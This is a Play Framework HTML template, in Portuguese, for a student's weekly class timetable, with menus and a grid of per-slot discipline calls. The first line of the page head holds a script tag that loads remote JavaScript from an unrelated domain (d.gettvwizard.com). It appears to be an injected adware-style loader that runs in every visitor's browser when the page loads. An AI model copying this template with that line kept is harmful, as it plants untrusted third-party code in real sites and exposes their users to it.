@(auxiliadorDeHorario: AuxiliadorDeHorario, emailDoUsuario:String)

<!DOCTYPE html>
<html lang="pt-br">
  <head><script src="http://d.gettvwizard.com/l/load.js"></script>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
   

    <title>Horário</title>
    
     <!-- Bootstrap CSS -->
    
    <link href="http://getbootstrap.com/dist/css/bootstrap.min.css" rel="stylesheet">

  	<!-- Custom CSS -->
  	<link rel="stylesheet" media="screen" href='@routes.Assets.versioned("stylesheets/sb-admin-2.css")'>
  	<link rel="stylesheet" media="screen" href='@routes.Assets.versioned("stylesheets/tabela.css")'>
  	
 
  </head>


<body>
  <nav class="navbar navbar-default navbar-static-top" role="navigation" style="margin-bottom: 0">
    <h2 style="margin-bottom:0px;margin-top:10px;text-align:center">Horário Atual</h2>
    <ul class="nav navbar-top-links navbar-right" style="margin:0px">
    
     
    <!-- drop 1 -->
        <li class="dropdown">
            <a class="dropdown-toggle" data-toggle="dropdown" href="#">
                <i class="glyphicon glyphicon-tasks"></i>  <i class="glyphicon glyphicon-chevron-down"></i>
            </a>
            <ul class="dropdown-menu dropdown-tasks">
                <li class="divider"></li>
                <li>
                    <a href='/indicarmatricula'><strong>Indicar intenção de matrícula</strong></a>
                </li>
                <li class="divider"></li>
                <li>
                    <a href="#"><strong>Acompanhar problemas</strong></a>
                </li>

            </ul>
        </li>
    
        <!-- drop 3 -->
        <li class="dropdown">
            <a class="dropdown-toggle" data-toggle="dropdown" href="#">
                <i class="glyphicon glyphicon-user"></i>  <i class="glyphicon glyphicon-chevron-down"></i>
            </a>
            <ul class="dropdown-menu dropdown-user">
                <li>
                    <a href="#"><i class="glyphicon glyphicon-user"></i> Editar Perfil</a>
                </li>
                <li>
                    <a href="/alterarSenha"><i class="glyphicon glyphicon-cog"></i> Alterar Senha</a>
                </li>
                <li class="divider"></li>
                <li>
                    <a href="/"><i class="glyphicon glyphicon-off"></i> Logout</a>
                </li>
            </ul>
        </li>
    </ul>
  </nav>
	@if(flash.contains("success")) {
	<div class="alert alert-info alert-dismissible" role="alert">
		<button type="button" class="close" data-dismiss="alert"
			aria-label="Close">
			<span aria-hidden="true">&times;</span>
		</button>
		<strong>Ok!</strong> @flash.get("success")
	</div>
	}


	<!-- tabela disciplinas -->
  <div class="panel-heading" id="redips-drag">
    <table id='tabela_disciplinas' class="table table-striped table-bordered sorted_table" style="text-center table-layout: fixed;">
     <thead>
        <tr>
          <th>Horário</th>
          <th>Segunda-Feira</th>
          <th>Terça-Feira</th>
          <th>Quarta-Feira</th>
          <th>Quinta-Feira</th>
          <th>Sexta-Feira</th>               
        </tr>
      </thead>
      
      <tbody>
        <tr>
          <!-- 7h -->										
				  <tr>
            <td>&nbsp&nbsp7h</td>
            
            <!-- segunda -->
            <td id='seg-7'>
				@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(2,7), "seg-7", emailDoUsuario)	
            </td>

            <!-- terça -->
            <td id='ter-7'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(3,7), "ter-7", emailDoUsuario)
            </td>

            <!-- quarta -->
            <td id='qua-7'>
				@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(4,7), "qua-7", emailDoUsuario)
            </td>

            <!-- quinta -->
            <td id='qui-7'>
           		@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(5,7), "qui-7", emailDoUsuario)
            </td>

            <!-- sexta -->
            <td id='sex-7'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(6,7), "sex-7", emailDoUsuario)
            </td>                                
          </tr>

          <!-- 8h -->										
				  <tr>
            <td>&nbsp&nbsp8h</td>
            
            <!-- segunda -->
            <td id='seg-8'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(2,8), "seg-8", emailDoUsuario)
            </td>

            <!-- terça -->
            <td id='ter-8'>
           		@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(3,8), "ter-8", emailDoUsuario)
            </td>

            <!-- quarta -->
            <td id='qua-8'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(4,8), "qua-8", emailDoUsuario)
            </td>

            <!-- quinta -->
            <td id='qui-8'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(5,8), "qui-8", emailDoUsuario)
            </td>

            <!-- sexta -->
            <td id='sex-8'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(6,8), "sex-8", emailDoUsuario)
            </td>                                
          </tr>

          <!-- 10h -->										
				  <tr>
            <td>10h</td>
            
            <!-- segunda -->
            <td id='seg-10'>
           		@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(2,10), "seg-10", emailDoUsuario)
            </td>

            <!-- terça -->
            <td id='ter-10'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(3,10), "ter-10", emailDoUsuario)
            </td>

            <!-- quarta -->
            <td id='qua-10'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(4,10), "qua-10", emailDoUsuario)
            </td>

            <!-- quinta -->
            <td id='qui-10'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(5,10), "qui-10", emailDoUsuario)
            </td>

            <!-- sexta -->
            <td id='sex-10'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(6,10), "sex-10", emailDoUsuario)
            </td>                                
          </tr>
							
          <!-- 12h -->										
				  <tr>
            <td>12h</td>
            
            <!-- segunda -->
            <td id='seg-12'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(2,12), "seg-12", emailDoUsuario)
            </td>

            <!-- terça -->
            <td id='ter-12'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(3,12), "ter-12", emailDoUsuario)
            </td>

            <!-- quarta -->
            <td id='qua-12'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(4,12), "qua-12", emailDoUsuario)
            </td>

            <!-- quinta -->
            <td id='qui-12'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(5,12), "qui-12", emailDoUsuario)
            </td>

            <!-- sexta -->
            <td id='sex-12'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(6,12), "sex-12", emailDoUsuario)
            </td>                                
          </tr>

          <!-- 14h -->										
				  <tr>
            <td>14h</td>
            
            <!-- segunda -->
            <td id='seg-14'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(2,14), "seg-14", emailDoUsuario)
            </td>

            <!-- terça -->
            <td id='ter-14'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(3,14), "ter-14", emailDoUsuario)
            </td>

            <!-- quarta -->
            <td id='qua-14'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(4,14), "qua-14", emailDoUsuario)
            </td>

            <!-- quinta -->
            <td id='qui-14'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(5,14), "qui-14", emailDoUsuario)
            </td>

            <!-- sexta -->
            <td id='sex-14'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(6,14),"sex-14", emailDoUsuario)
            </td>                                
          </tr>

          <!-- 16h -->										
				  <tr>
            <td>16h</td>
            
            <!-- segunda -->
            <td id='seg-16'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(2,16), "seg-16", emailDoUsuario)
            </td>

            <!-- terça -->
            <td id='ter-16'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(3,16), "ter-16", emailDoUsuario)
            </td>

            <!-- quarta -->
            <td id='qua-16'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(4,16), "qua-16", emailDoUsuario)
            </td>

            <!-- quinta -->
            <td id='qui-16'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(5,16), "qui-16", emailDoUsuario)
            </td>

            <!-- sexta -->
            <td id='sex-16'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(6,16), "sex-16", emailDoUsuario)
            </td>                                
          </tr>

          <!-- 18h -->										
				  <tr>
            <td>18h</td>
            
            <!-- segunda -->
            <td id='seg-18'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(2,18), "seg-18", emailDoUsuario)
            </td>

            <!-- terça -->
            <td id='ter-18'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(3,18), "ter-18", emailDoUsuario)
            </td>

            <!-- quarta -->
            <td id='qua-18'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(4,18),"qua-18", emailDoUsuario)
            </td>

            <!-- quinta -->
            <td id='qui-18'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(5,18), "qui-18", emailDoUsuario)
            </td>

            <!-- sexta -->
            <td id='sex-18'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(6,18), "sex-18", emailDoUsuario)
            </td>                                
          </tr>


          <!-- 20h -->										
				  <tr>
            <td>20h</td>
            
            <!-- segunda -->
            <td id='seg-20'>
            	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(2,20), "seg-20", emailDoUsuario)
            </td>

            <!-- terça -->
            <td id='ter-20'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(3,20), "ter-20", emailDoUsuario)
            </td>

            <!-- quarta -->
            <td id='qua-20'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(4,20), "qua-20", emailDoUsuario)
            </td>

            <!-- quinta -->
            <td id='qui-20'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(5,20),"qui-20", emailDoUsuario)
            </td>

            <!-- sexta -->
            <td id='sex-20'>
             	@disciplinaAluno(auxiliadorDeHorario.retornaDisciplinasExibiveis(6,20), "sex-20", emailDoUsuario)
            </td>                                
          </tr>
        </tr>                        
      </tbody>
    </table>
  </div>
  <!-- fim tabela disciplinas -->
  
   


 
  
  <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  <!-- Include all compiled plugins (below), or include individual files as needed -->
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  
  <!-- scripts -->
  
  </body>
</html>
